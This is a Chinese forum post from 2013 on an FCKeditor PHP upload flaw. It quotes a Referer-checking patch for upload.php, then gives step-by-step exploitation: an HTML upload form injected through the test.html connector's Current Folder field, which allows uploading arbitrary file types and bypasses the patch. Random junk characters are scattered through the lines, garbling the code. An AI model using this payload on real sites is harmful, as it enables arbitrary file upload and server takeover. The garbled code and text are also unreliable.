漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
: C5 r' n! J/ X" J* [网上给出的修复方案是
) C3 M- O/ C8 [5 ] M1 M修复方法,删除FCK编辑器用其他的编辑器
# B2 M3 ` h2 [7 b或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
# J6 d* A q; @: l& G' n在
5 \ i# n3 K3 q& `require(‘config.php’);3 ^. H1 T/ q5 }
require(‘util.php’);
. T1 U! I, V& {4 T的下面添加以下代码—————————–
i G/ l$ F# ?( \" Z//防止外部提交
) H( g0 ?. E S1 t: pfunction outsidepost()
, }8 Y. p0 E% H5 A" f. a9 m{
, n a: S, P6 N! a$servername=$_SERVER['SERVER_NAME'];3 J- O( P1 {& x4 @' V: R1 _' c2 i: W
$sub_from=@$_SERVER['HTTP_REFERER'];4 o9 f3 O* Y+ b* L
$sub_len=strlen($servername);, R2 Q) D5 \) }- }- w" u
$checkfrom=substr($sub_from,7,$sub_len);, T7 _! t, Z! T# B8 {
if($checkfrom!=$servername){; u9 H1 J ]1 |
echo(“you don’t outsidepost!”);* n# _4 p3 J3 T0 }
exit;; R$ m. n1 T( K9 I# l5 i3 g3 |# H
}
" c6 Q* J' e4 [. B# h+ y. q# w# m, y' _}
$ e, m2 X; _& A, d1 o2 Poutsidepost();
8 ~( w* ^7 U9 L. N+ h防止外部提交,但是没有防止内部提交,
8 {/ Y9 T$ U2 t, m+ [/ N; j利用方法:
$ W+ Y4 @, x4 J0 G/ G, m1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html4 p2 Y8 t; K3 ~! r5 Y( w5 y
2,在Current Folder 框输入
( |& P, W4 Z4 K<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>6 z4 [+ M+ b# l. y7 K3 j8 b q
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。' u. V: Z( i( G$ ^1 F, X
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对